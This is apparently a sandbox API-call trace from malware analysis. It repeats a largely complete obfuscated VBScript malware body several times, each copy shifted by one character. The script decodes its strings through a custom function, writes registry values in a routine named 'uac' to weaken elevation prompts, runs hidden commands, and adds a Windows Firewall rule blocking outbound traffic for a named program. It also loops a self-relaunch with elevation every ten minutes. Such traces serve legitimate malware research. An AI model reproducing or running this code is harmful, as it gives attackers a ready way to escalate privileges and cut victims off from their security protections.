okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.341] wcsncmp (_String1="icy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.341] wcsncmp (_String1="cy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.341] wcsncmp (_String1="y.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0226.341] wcsncmp (_String1=".Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 